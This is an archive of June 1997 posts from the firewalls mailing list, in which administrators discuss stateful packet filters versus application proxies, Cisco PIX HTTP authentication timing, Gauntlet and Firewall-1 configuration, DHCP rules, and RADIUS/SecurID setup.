Received: (from sjg@localhost) by zen.quick.com.au (8.8.5/8.7.3) id XAA11893; Tue, 10 Jun 1997 23:43:59 +1000 (EST)
Date: Tue, 10 Jun 1997 23:43:59 +1000 (EST)
From: "Simon J. Gerraty" 
Message-Id: <199706101343.XAA11893@zen.quick.com.au>
To: Geoff Mulligan 
Cc: firewalls@greatcircle.com
Subject: Re: Stateful Packet Filters vs. Proxies 
References: <199706091830.MAA02426@future.mulligan.com>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Geoff Mulligan writes:
>sjg@quick.com.au said:
>> One thing to note - SPF and crypto do not mix. 

>What!  Certainly SPF and crypto do mix.  Take a look at Sunscreen.  It is a 
>stateful packet screen AND supports strong crypto through the use of SKIP.

Link level crypto, sure.  Not everyone likes that though.
I was refering to folk trying to use SSLftp, where the connection is
authenticated and encrypted at the application level.  Because a SPF
cannot look inside the payload in such a case, the dynamic opening of
ports will fail.

>Maybe you meant to say that NAT and crypto do not mix, but again depending on 

Funny, you're the 2nd person to suggest that.  But no, I mean exactly
what I said.  Think about it - why would NAT be a problem? Because the
SPF cannot look inside the payload (for the port command to translate
the address and open a window for the return data connection to the
listed port).  Turn off NAT, and what changes - the SPF cannot look
inside the payload so see the port command - to open a window for the
return data connection.  The result is the same with or without NAT,
the SPF does not allow the in-bound connection.

--sjg
-- 
Simon J. Gerraty        

#include    /* imagine something _very_ witty here */

From owner-firewalls-outgoing  Tue Jun 10 08:50:30 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id HAA15075 for firewalls-outgoing; Tue, 10 Jun 1997 07:20:59 -0700 (PDT)
Received: from dns.eng.auburn.edu (dns.eng.auburn.edu [131.204.10.13]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id HAA15054 for ; Tue, 10 Jun 1997 07:20:51 -0700 (PDT)
Received: from netman.eng.auburn.edu (netman.eng.auburn.edu [131.204.12.24])
	by dns.eng.auburn.edu (8.8.5/8.6.4) with ESMTP id JAA07448;
	Tue, 10 Jun 1997 09:21:43 -0500 (CDT)
From: Doug Hughes 
Received: (doug@localhost) by netman.eng.auburn.edu (SMI-8.6/8.6.4) id JAA13901; Tue, 10 Jun 1997 09:21:43 -0500
Date: Tue, 10 Jun 1997 09:21:43 -0500
Subject: Re: Stateful Packet Filters vs. Proxies 
To: hagan@cih.com
Cc: firewalls@greatcircle.com
Message-Id: 
X-Mailer: TkMail 4.0beta8
In-Reply-To:  
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk



>> my personal experience has been good.
>> 
>> I disagree that a SPF != a proxy, at least not
>> entirely.
>
>you make an interesting argument. I will assert my belief that SPFs and
>proxies represent something akin to convergent evolution -- are bats
>special cases of birds, marsupial mice special cases of mice, etc?
>Admittedly, unlike evolution, we have a situation where people can learn
>from others' successes and failures. Things may look like ducks, quack
>like ducks, but if their DNA/source says "not a duck" it ain't a duck.

And I agree. I've said it here before, but it seems worth pointing out
again. It seems to me that the Application Proxy is a top-down approach
to filtering and the SPF is a bottom-up approach.  Both at some level
have functionality of the other. (the SPF can be built to understand
and re-write the protocol - at some level of effort, and the AP can 
be built to examine lower level protocol details, also at some level
of effort)

It is, however, interesting to see people arguing the merits of each.
I'm inclined to believe at this point in time, though, that the Application
Proxy is a bit more well understood and mature than the SPF, not to say
that a lot of good work isn't being done on the SPF.

--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu



From owner-firewalls-outgoing  Tue Jun 10 08:51:46 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA07264 for firewalls-outgoing; Tue, 10 Jun 1997 06:33:20 -0700 (PDT)
Received: from zen.quick.com.au (gate.quick.com.au [203.12.250.130]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA07207 for ; Tue, 10 Jun 1997 06:33:06 -0700 (PDT)
Received: (from sjg@localhost) by zen.quick.com.au (8.8.5/8.7.3) id XAA11232; Tue, 10 Jun 1997 23:33:31 +1000 (EST)
Date: Tue, 10 Jun 1997 23:33:31 +1000 (EST)
From: "Simon J. Gerraty" 
Message-Id: <199706101333.XAA11232@zen.quick.com.au>
To: Mike Jones 
Cc: firewalls@greatcircle.com
Subject: Re: Stateful Packet Filters vs. Proxies
References:  <339C52F9.2ADBE22F@unifiedtech.com>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Mike Jones writes:
>> Specific vulnerabilities include buffer overflows in your MTA allowing
>> /bin/sh to be executed as that UID.  How about the IMAP and POP3 holes
>> that were recently published.  You could not have exploited these on a
>> application based IMAP or POP3 proxy.

>You could not exploit them on an SPF, either, since it wouldn't be
>running the MTA. This (to me) falls into the category of not 
>neglecting security on internal systems just because you have
>a firewall in place.

I think the point being made there was exactly that.  In the SPF case,
the external connection deals directly with an MTA on a machine behind
the "firewall".  

Remember the firewall itself is not the ultimate goal of an attack,
the systems behind it are.

>are. Since an SPF doesn't reassemble or interpret entire service
>requests, it's immune to (for example) a buffer overflow attack
>based on the way a particular SMTP command is interpreted.

Quite true, but in such cases you then need to look to the machine
that _is_ doing that role.  If its not part of your firewall, what is
your firewall doing?  

Sure proxies can blow up like any other code - everyone who used
syslog() was vulnerable to that, but if a proxy blows up and dumps
core or worse, the attacker is still not necessarily past your
firewall.  Also if the proxies are run chrooted, and without privs,
the opportunites for exploiting such a bug are more limited.

Don't get me wrong, I think SPF is a good and useful technology, I'd
prefer to have it than not, - every firewall has to do packet
filtering after all.  But there are and will be cases were I prefer an
application level proxy - ftp is one of them.

--sjg
-- 
Simon J. Gerraty        

#include    /* imagine something _very_ witty here */

From owner-firewalls-outgoing  Tue Jun 10 09:43:41 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA06557 for firewalls-outgoing; Tue, 10 Jun 1997 06:26:49 -0700 (PDT)
Received: from brussels.cisco.com (brussels.cisco.com [171.68.129.238]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA06538 for ; Tue, 10 Jun 1997 06:26:37 -0700 (PDT)
Received: from cons-evyncke.cisco.com (bru-dhcp30.cisco.com [171.68.129.144])
	by brussels.cisco.com (8.8.5/8.8.5) with SMTP id PAA24475;
	Tue, 10 Jun 1997 15:24:40 +0200 (METDST)
Message-Id: <3.0.32.19970610152710.006e8748@brussels.cisco.com>
X-Sender: evyncke@brussels.cisco.com
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Tue, 10 Jun 1997 15:27:26 +0000
To: Colin Campbell , firewalls@GreatCircle.COM
From: Eric Vyncke 
Subject: Re: PIX http authentication question
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 09:06 10/06/97 +1000, Colin Campbell wrote:
>Hi,
>
>Would someone knowledgeable (or otherwise :-) care to enlighten
>me (and possibly others) on how the PIX authenticates users of
>the HTTP protocol.

The simplified scenario is the following:
1) the client host opens an HTTP connection to the server host
2.a) if the client host was previously authenticated, the PIX
   is transparent (only randomizing of TCP sequence number
   and accounting)
2.b) else the PIX intercepts the SYN packet and completes the TCP
   handshake in behalf of the server host
3) if the client was not previously authenticated, the PIX
   read the HTTP MIME header and looks for the authentication
   MIME header

Then two cases:
3.a) the authentication is there:
     3.a.1) the PIX checks the validity of the information against
	     a TACACS+ or Radius security server
     3.a.2) if OK, the PIX initiates a TCP connection to the
            server host in behalf of the client, send the received
            HTTP MIME header
     3.a.3) then the PIX behaves as in 2.a) 
3.b) the authentication is not there:
     3.b.1) the PIX sends in behalfs of the server an HTTP error
     message 431 or ??? meaning authentication is needed
     3.b.2) the PIX closes the connection
     3.b.3) the client browser prompts the user for username/password
     3.b.4) the client browser re-initiates the whole scenario
   	     at 1) with a HTTP MIME authentication header

In summary:
1) authentication is done once every 15 minutes (to avoid authentication
   on every HTTP requests)
2) authentication is done by refusing the first HTTP request with
   an HTTP standard error message asking for authentication
3) the scenario is more complicate but works as well is the
   server requests also authentication
4) BTW once authenticated, the Radius or Tacacs+ server can
   download a specific ACL for the user

Further comments in-line...
>

>It is this process in which I need more information. There seem to
>be several shortcomings on this sort of authentication based on IP.
>
>    Consider sites using DHCP. It is possible that someone not
>    allowed internet access (it happens) gets a free IP that
>    is (by virtue of the fact the previous user authenticated).

The authentication is valid only for 15 minutes... so possible
you open a hole for 14min 59sec. This timer is fixed in the current
version but will be a parameter in the future.

I think there are no alternatives....
>
>    Same thing goes for dialup users getting a previously
>    authenticated IP with time still left on the Pix meter.
>

Same comments ;-)

>    Consider multi-user hosts. Only the first person through the
>    firewall needs to authenticate - everyone else travels on that
>    same "ticket".

Right as well.


Hope this helps

Eric

  Eric Vyncke      
Technical Consultant              Cisco Systems Belgium SA/NV
Phone:  +32-2-778.4677             Fax:    +32-2-778.4300
E-mail: evyncke@cisco.com          Mobile: +32-75-312.458

From owner-firewalls-outgoing  Tue Jun 10 09:54:33 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA07858 for firewalls-outgoing; Tue, 10 Jun 1997 06:37:04 -0700 (PDT)
Received: from raid2.fddi.phoenix.net (alpha400.phoenix.net [207.43.3.5]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA07836 for ; Tue, 10 Jun 1997 06:36:54 -0700 (PDT)
Received: from gdo (mci212.aspentec.com [206.24.77.212]) by raid2.fddi.phoenix.net (8.8.5/8.6.12) with SMTP id IAA11240; Tue, 10 Jun 1997 08:47:16 -0500 (CDT)
Message-Id: <3.0.32.19970610082939.00906380@newf.com>
X-Sender: gdo@newf.com
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Tue, 10 Jun 1997 08:33:33 -0500
To: Ryan Russell/SYBASE  
From: "Gregory D. Otto" 
Subject: Re: Stateful Packet Filters vs. Proxies
Cc: firewalls 
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 01:06 PM 6/9/97 EDT, Ryan Russell/SYBASE wrote:
>Yes, I don't believe the SPFs will fragment, keep
>seperate window sizes, etc.. Unless the layer 2 networks
>on each size are significantly different.

An SPF can not keep seperate window sizes.  By definition, there is only
one  TCP session in an SPF where there are two sessions in a PROXY.  Thus,
in a SPF, the end nodes are responsible for handling window sizes not the
SPF.  A SPF is at the lowest level still a router (maybe a bridge).  On the
otherhand, a proxy can do this as each session will have seperate windowing
and everything else.  

For example, I have seen where an HTTP proxy would receive 3 each 500 (or
so) byte packets in and turn around an forward on a  1500 (or so) byte
packet.  An SPF can not do this as.  An SPF can not do this as only end
nodes can de-fragment.  Also, this did not appear to be so much a
defragmentation issue as it was a process of "store-review-forward" which
created the de-fragmentation benefit.

>
>No, I don't think that there is anything an SPF 
>can block (in the data stream) that a proxy
>can't.  But, I will claim that the opposite is true, too.
>

>From my understanding when looking at some of the different technologies,
was that many SPF are based more on HEX pattern matching using offsets in
the packet.  Whereas, a proxy actually processes the data as data versus
HEX bytes.  If this is true (please let me know one way or the other), than
I would think it would be very difficult to write a good set of SPF filters
to do higher layer decisions (i.e. URL logging, checking.....).  A true
proxy on the otherhand could be written to do this and provide a much
easier user interface for writing the rulesets.  For example, to determine
which URL's cannot be visited, could be simply listed in a file versus.

On the otherhand, maybe something like FW-1's Inspect language may help
this by provindg a "front end" to this programming.

Greg



>From my understanding when looking at some of the different technologies,
was that many SPF are based more on HEX pattern matching using offsets in
the packet.  Whereas, a proxy actually processes the data as data versus
HEX bytes.  If this is true (please let me know one way or the other), than
I would think it would be very difficult to write a good set of SPF filters
to do higher layer decisions (i.e. URL logging, checking.....).  A true
proxy on the otherhand could be written to do this and provide a much
easier user interface for writing the rulesets.  For example, to determine
which URL's cannot be visited, could be simply listed in a file versus.

On the otherhand, maybe something like FW-1's Inspect language may help
this by provindg a "front end" to this programming.

Greg


============================================================================
Gregory Otto                       e-mail  gdo@newf.com
New Frontier Consulting            WWW     http://www.newf.com
Houston, Texas                     Voice   (713) 718-1358
============================================================================


From owner-firewalls-outgoing  Tue Jun 10 10:10:50 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id WAA17107 for firewalls-outgoing; Mon, 9 Jun 1997 22:14:52 -0700 (PDT)
Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id VAA15104 for ; Mon, 9 Jun 1997 21:54:50 -0700 (PDT)
Received: from wlv.iipo.gtegsc.com (WLV.IIPO.GTEGSC.COM [199.107.242.11]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with ESMTP id VAA01102 for ; Mon, 9 Jun 1997 21:32:27 -0700 (PDT)
Received: from SPIELZEUG.IIPO.GTEGSC.COM (SPIELZEUG.IIPO.GTEGSC.COM [199.107.242.241])
	by wlv.iipo.gtegsc.com (8.8.5/8.8.5) with SMTP id VAA08370;
	Mon, 9 Jun 1997 21:26:03 -0700 (PDT)
Date: Mon, 9 Jun 1997 21:24:06 -0700 (PDT)
From: Merton Campbell Crockett 
To: Andrew & Terri Forster 
cc: bsdi-users@bsdi.com, firewalls@greatcircle.com
Subject: Re: TCP/IP Addressing Problems with FireWall
In-Reply-To: <3.0.1.32.19970609224754.0069e2fc@emirates.net.ae>
Message-ID: 
X-X-Sender: mcc@wlv.iipo.gtegsc.com
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk


194.bbb.ccc.1 is the default gateway for the Firewall and all systems
attached to the 194.bbb.ccc.0 network.

Your Gauntlet Firewall must be configured for IP forwarding.  It also needs
to listen for route announcements from the 194.bbb.ccc.1 and announce, at a
minimum, a default route out its 172.17.100.1 interface.

It's probably easier to have systems on the 172,17.0.0 network have their
default gateway specified as 172.17.200.2.  The Cisco will receive the
default route announcement from the Gauntlet Firewall and issue ICMP
redirects to systems wanting to reach the outside world.

For the 172.16.0.0 network, systems should have 172.16.200.2 specified as
their default gateway.  Only the proxied services need point to the Gauntlet
Firewall.

Not all systems, necessarily, understand flat Class B networks.  If you have
any systems that assume a Class B network is routed you will need to define
secondary addresses on your Cisco router.  You will also need to make sure
that Cisco's proxy arp has not been disabled.

Merton Campbell Crockett


On Mon, 9 Jun 1997, Andrew & Terri Forster wrote:

} We purchased "gauntlet-type" proxy server firewall to complete our
} perimeter defences project including connection to the Internet.
} 
} We are having problems of Internal clients being able to see (ping) the
} Firewall and for the BSDI FireWall box to ping internal machines across our
} internal router.  I have prepared a rough diagram below then some
} explanations.
} 
}           I N T E R N E T 
}                  |
}                  |
}           _______|_______
}          |               |
}          |               |  Internet Router 194.bbb.ccc.1 s/net 255.255.255.0
}          |_______________|
}                  |
}                  |
}       ___________|_____________________________   194.bbb.ccc.* Network
}                      |
}                      |
}                      |
}             _________|___________   Outside 194.bbb.ccc.9 s/net 255.255.255.0
}            |                     |       Default Router  194.bbb.ccc.1
}            |       Firewall      |
}            |_____________________|  Inside 172.17.100.1 s/net 255.255.0.0
}                      |
}                      |
}       _______________|_________________________  172.17.*.* Network (B Class)
}                |                     |
}                |               ______|______
}                |              |  W95 Client |  172.17.30.13 B S/net
}                |              |_____________|  Gateway 172.17.200.2
}                |
}                |
}       _________|_____________________
}      |     172.17.200.2              |
}      |       Cisco Router            |____________________  172.20.*.*
}      |       172.16.200.2            |                       (B Class)
}      |____________|__________________|
}                   |
}                   |
}       ____________|____________________________  172.16.*.* Network (B Class)
}                                 |
}                                 |
}                            _____|_______
}                           | W95 Client  |  172.16.30.11 (Gateway 172.16.200.2)
}                           |_____________|
} 
} Note this is a test implementation of our final IP addressing Plan.  Our
} registered IP C Class is used on the outside of the FireWall proxy server
} firewall 194.bbb.ccc.* and our inside of the Firewall we use a a 172.17.*.*
} B class network to our internal Router which also has other non-internet
} data feeds (eg 172.20.*.* above).  On the inside of this internal router we
} are planning to use the IP address 172.16.*.* B Class network.
} 
} Our problem is that clients on the 172.16.*.* network cannot ping (see) the
} firewall as its default router (gateway) is set as 194.bbb.ccc.1.  Also the
} clients on the 172.17.*.* network can see the internal network only when
} the gateway is set as the 172.17.200.2 interface of the Router.  Therefore
} it will not be able to see the Internet as all traffic is sent to the
} inside not the outside.  The other external connections work fine as they
} all refer to their Internal Router port as their default router (gateway).
} 
} Obviously I need to determine how to solve this so that the external
} traffic is directed to the Internet by the firewall and inside traffic
} correctly through the Router to the 172.16.*.* subnet.
} 
} Any Assistance would be appreciated
} 
} Thanks in Advance
} 
} AMF
} 
} 
} ==========================================================================
}  Andrew M Forster       [GMT +4]           Email: forster@emirates.net.ae
}  Phone: +9712 262556 or +9712 453613                  Fax:   +9712 465344
} ==========================================================================
} 


From owner-firewalls-outgoing  Tue Jun 10 10:48:33 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA24359 for firewalls-outgoing; Tue, 10 Jun 1997 08:12:13 -0700 (PDT)
Received: from gov.on.ca (govonca.gov.on.ca [192.75.156.244]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id IAA24228 for ; Tue, 10 Jun 1997 08:11:48 -0700 (PDT)
Received: from govonca2.gov.on.ca by gov.on.ca (5.65v3.2/Ultrix3.0-C)
	id AA14860; Tue, 10 Jun 1997 11:13:00 -0400
Received: from walkerj.gov.on.ca by govonca2.gov.on.ca; (8.7.5/1.1.8.2/03Nov94-0842PM)
	id LAA03243; Tue, 10 Jun 1997 11:13:35 -0400 (EDT)
Received: by walkerj.gov.on.ca with Microsoft Mail
	id <01BC758F.B1E85DE0@walkerj.gov.on.ca>; Tue, 10 Jun 1997 11:16:08 -0400
Message-Id: <01BC758F.B1E85DE0@walkerj.gov.on.ca>
From: James Walker 
To: "'firewalls@greatcircle.com'" 
Subject: FW1 Large Network Protection Question 
Date: Tue, 10 Jun 1997 11:16:02 -0400
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Anyone out there installed firewall-1 product to protect a large network =
made up of multiple class C Networks ???? My telecom staff seem to =
believe that the sparc 20 that we are intending to use will die upon =
implementation as It was not designed to be a router.  =20

Any Insights ???? 

From owner-firewalls-outgoing  Tue Jun 10 11:24:08 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA23113 for firewalls-outgoing; Tue, 10 Jun 1997 08:02:47 -0700 (PDT)
Received: from diablo.cisco.com (diablo.cisco.com [171.68.223.106]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id IAA23095 for ; Tue, 10 Jun 1997 08:02:40 -0700 (PDT)
Received: from big-dawgs.cisco.com (herndon-dhcp-107.cisco.com [171.68.53.107]) by diablo.cisco.com (8.8.5/CISCO.SERVER.1.2) with SMTP id IAA29405; Tue, 10 Jun 1997 08:03:17 -0700 (PDT)
Message-Id: <3.0.1.32.19970610110317.006c23fc@lint.cisco.com>
X-Sender: pferguso@lint.cisco.com
X-Mailer: Windows Eudora Pro Version 3.0.1 (32)
Date: Tue, 10 Jun 1997 11:03:17 -0400
To: Basil McCrea 
From: Paul Ferguson 
Subject: Re: RFC for Ports
Cc: "'firewalls@greatcircle.com'" 
In-Reply-To: <01BC75AE.E2456810@pc00874.ina.de>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

RFC1700.

- paul

At 02:59 PM 06/10/97 +0200, Basil McCrea wrote:

>Hi,
>
>Maybe a dumb question, but can anyone tell me which RFC describes which
>port numbers correspond to which services.
>
>TIA
>
>Basil McCrea
>
>

--
Paul Ferguson                                           ||        ||
Consulting Engineering                                  ||        ||
Herndon, Virginia   USA                                ||||      ||||
tel: +1.703.397.5938                               ..:||||||:..:||||||:..
e-mail: pferguso@cisco.com                         c i s c o S y s t e m s

From owner-firewalls-outgoing  Tue Jun 10 11:28:34 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA00870 for firewalls-outgoing; Mon, 9 Jun 1997 12:52:23 -0700 (PDT)
Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id MAA00844 for ; Mon, 9 Jun 1997 12:52:14 -0700 (PDT)
Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35])
          by halon.sybase.com (8.8.4/8.8.4) with SMTP
	  id MAA22961 for ; Mon, 9 Jun 1997 12:56:23 -0700 (PDT)
Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896)
	id AA06045; Mon, 9 Jun 97 12:54:11 PDT
Received: (from unixsvr1@localhost)
          by notesgw2.sybase.com (8.8.4/8.8.4)
	  id MAA17402 for @sybgate.sybase.com:firewalls@GreatCircle.COM; Mon, 9 Jun 1997 12:53:02 -0700 (PDT)
Message-Id: <199706091953.MAA17402@notesgw2.sybase.com>
Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id
  DEEEAAC4BA582D42882564B1006DCEF1; Mon,  9 Jun 97 12:53:00 EDT
To: Donald Branch 
Cc: firewalls 
From: Ryan Russell/SYBASE
  
Date:  9 Jun 97 12:59:42 EDT
Subject: Re: DHCP and firewall1
X-Lotus-Type: Reply All
Mime-Version: 1.0
Content-Type: Text/Plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

What do you mean by "work with" ?

    Ryan

---------- Previous Message ----------
To: firewalls
cc: 
From: donaldb@ncmi-ny.com (Donald Branch) @ smtp
Date: 06/09/97 01:33:15 PM
Subject: DHCP and firewall1

Has anyone configured firewall 1 to work with DHCP can someone tell  
me how they went about this issue.

         
Donald Branch
         
Unix sysAdmin NationsBanc
        
P.S. Faith is finding answers in the heart         
         





From owner-firewalls-outgoing  Tue Jun 10 11:31:44 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id HAA21934 for firewalls-outgoing; Tue, 10 Jun 1997 07:56:41 -0700 (PDT)
Received: from dub-img-9.compuserve.com (dub-img-9.compuserve.com [149.174.206.139]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id HAA21911 for ; Tue, 10 Jun 1997 07:56:32 -0700 (PDT)
Received: by dub-img-9.compuserve.com (8.6.10/5.950515)
	id KAA02471; Tue, 10 Jun 1997 10:57:27 -0400
Date: Tue, 10 Jun 1997 10:56:59 -0400
From: john madincea 
Subject: Handling multiple firewall connections
To: GreatCircle 
Message-ID: <199706101057_MC2-1831-417B@compuserve.com>
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain; charset=ISO-8859-1
Content-Disposition: inline
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

It is my understanding that configuring more than 3 NIC's into a firewall=

can be very
complicated.  If this is true, then what is the solution for multiple
connections.  I've
heard discussions about firewall farms and am wondering if they are the
answer. =

 Are there any  legal or configuration (3 or more NICs) issues related wi=
th
doing the following.

    Vendor A       Vendor B       Vendor C                      ( etc....=
 )
            |                        |                         |
       Router           Router             Router                        =

(or single router with multiple interfaces)
            |                        |                         |
            ---------------------------------------
                                                |
                                        Firewall
                                                |
                                         Router
                                                |
                                  Internal Network

If you can point me towards any URL's, manuals, or books discussing these=

issues I
would appreciate it.

TIA
John Madincea



From owner-firewalls-outgoing  Tue Jun 10 11:36:16 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA23586 for firewalls-outgoing; Tue, 10 Jun 1997 08:06:43 -0700 (PDT)
Received: from gatekeeper.bender.com (gatekeeper.bender.com [198.176.81.201]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id IAA23579 for ; Tue, 10 Jun 1997 08:06:37 -0700 (PDT)
Received: by gatekeeper.bender.com; (5.65v3.2/1.3/10May95) id AA30363; Tue, 10 Jun 1997 11:07:33 -0400
Date: Tue, 10 Jun 1997 11:07:31 -0400
From: itjjw01@bender.com (John Waterbury)
Message-Id: <199706101507.LAA20398@albadm02.bender.com>
To: firewalls@greatcircle.com
Subject: Re: DHCP and Firewall 1
X-Sun-Charset: US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk


> From mike.jones@unifiedtech.com Tue Jun 10 10:15:22 1997
> Date: Tue, 10 Jun 1997 09:10:16 -0400
> From: Mike Jones 
> Mime-Version: 1.0
> To: Geoff Breach 
> Cc: firewalls@greatcircle.com
> Subject: Re: DHCP and Firewall 1
> X-Priority: 3 (Normal)
> 
> Geoff Breach wrote:
> > On Mon,  9 Jun 97 16:44:44 -0400, donaldb@ncmi-ny.com (Donald Branch)
> > wrote:
> > >I have a Windows NT machine running DHCP  I want to be able from
> > >that one machine to be able to get out to AOL but since it's ip
> > >address keeps changing  I can't make a rule based on his ip address.
> > >keeps changing

Here's the key to the question I believe that is of concern. The ip that's
changing is AOL's.


> > Only one way. Keep it's IP address from changing. If you configure
> > your DHCP server to always hand out the same address to that
> > machine's MAC address, you get a middle ground between the benefits
> > of DHCP and the benefits of fixed addressing.
> 
> Not so. You can use user authentication on the outbound FTP
> session.
>  
> >  Yeah, there are other ways, authenticate, etc, but too much
> > trouble IMHO.
> 
> Too much trouble? For a single user? If it were for 50 users,
> then yeah, but for one it's no biggie.
> 
> As far as that goes, if you are using a reasonably large (say,
> a month or more) lease time on your DHCP server the IP address
> of the machine you're working on will never change unless you
> go off the network (e.g., don't turn the machine one) for over
> a month. So the idea of doing it by IP address isn't completely
> out of the question. DHCP doesn't have to be minute-by-minute
> dynamic in most environments to be useful.
> 
> --
> 	Mike Jones
> 	Sr. Technology Advisor
> 	UNIFIED Technologies

From owner-firewalls-outgoing  Tue Jun 10 12:38:02 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA24003 for firewalls-outgoing; Tue, 10 Jun 1997 08:10:20 -0700 (PDT)
Received: from relay5.UU.NET (relay5.UU.NET [192.48.96.15]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id HAA19137 for ; Tue, 10 Jun 1997 07:43:49 -0700 (PDT)
Received: from uucp4.UU.NET by relay5.UU.NET with SMTP 
	(peer crosschecked as: uucp4.UU.NET [192.48.96.35])
	id QQctio28813; Tue, 10 Jun 1997 10:44:40 -0400 (EDT)
Received: from mop.UUCP by uucp4.UU.NET with UUCP/RMAIL
        ; Tue, 10 Jun 1997 10:44:40 -0400
Received: from mopphil.phil.mop.com by mtb.phil.mop.com (4.1/SMI-4.1)
	id AA17835; Tue, 10 Jun 97 10:24:12 EDT
Received: from neumann.phil.mop.com by mopphil.phil.mop.com (4.1/SMI-4.1)
	id AA01111; Tue, 10 Jun 97 10:24:01 EDT
From: cdonahue@neumann.mop.com
Received: from ccMail by neumann.phil.mop.com (ccMail Link to SMTP R6.0)
    id AA865952666; Tue, 10 Jun 97 10:24:29 -0500
Message-Id: <9706108659.AA865952666@neumann.phil.mop.com>
X-Mailer: ccMail Link to SMTP R6.0
Date: Tue, 10 Jun 97 10:24:39 -0500
To: 
Subject: USR Radius 
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk


     Hi.  Please excuse the off topic question to follow but I feel this 
     group might be able to help me or point me in the right direction. 
     
     I'm am currently testbedding a USR netserver 16( isdn and Async modems 
     support) that I would like to authenticate users via the USR Solaris 
     Radius server which in turn would talk to a Secureid ACE server.  (In 
     the testbed, the ace server and the radius server will be running on 
     the same sparc 2).  USR at this point has been less than helpful and 
     any help from this group would be very much appreciated.  My first 
     impression is that a passthrough user needs to be created on the 
     Radius database will will require an ace challenge.  At this point I'm 
     not even sure how the client will interact will the prompts.  It's 
     looks like a Win/95 user running dial-up networking should "enable 
     terminal window" after the devices connect.  After that it appears 
     that the inet server will prompt for a username and passcode.  The 
     inetserver will then check it's own user table for this user.  It it 
     does not find the usercode, it will pass the request onto the radius 
     server.  The radius server should then somwhow pass the request onto 
     the ace server.  I'm now lost.  
     
     Specifically, I would like help configuring the radius server in terms 
     of creating a user that will go to an ace server authenticator.
     
     I will summarize if there appears to be any interest.  
     
     Thanks for your time.
     
     Craig Donahue
     Net Eng.
     BNP/CN
     cdonahue@mop.com
     610-995-1400



From owner-firewalls-outgoing  Tue Jun 10 13:04:50 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA20548 for firewalls-outgoing; Tue, 10 Jun 1997 11:01:03 -0700 (PDT)
Received: from [206.7.53.129] (external.digitalglobe.com [206.7.53.129]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id LAA20430 for ; Tue, 10 Jun 1997 11:00:25 -0700 (PDT)
Received: from indyrb.digitalglobe.com by [206.7.53.129]
          via smtpd (for honor.greatcircle.com [198.102.244.44]) with SMTP; 10 Jun 1997 17:59:33 UT
Received: from groupwiseco.digitalglobe.com by indyrb.digitalglobe.com via SMTP (951211.SGI.8.6.12.PATCH1042/951211.SGI.AUTO)
	for  id MAA14428; Tue, 10 Jun 1997 12:00:56 -0600
Received: from ewico-Message_Server by groupwiseco.digitalglobe.com
	with Novell_GroupWise; Tue, 10 Jun 1997 12:00:52 -0600
Message-Id: 
X-Mailer: Novell GroupWise 4.1
Date: Tue, 10 Jun 1997 12:00:46 -0600
From: Stephen Holden 
To: firewalls@greatcircle.com
Subject: Eagle NT questions
Mime-Version: 1.0
Content-Type: text/plain
Content-Disposition: inline
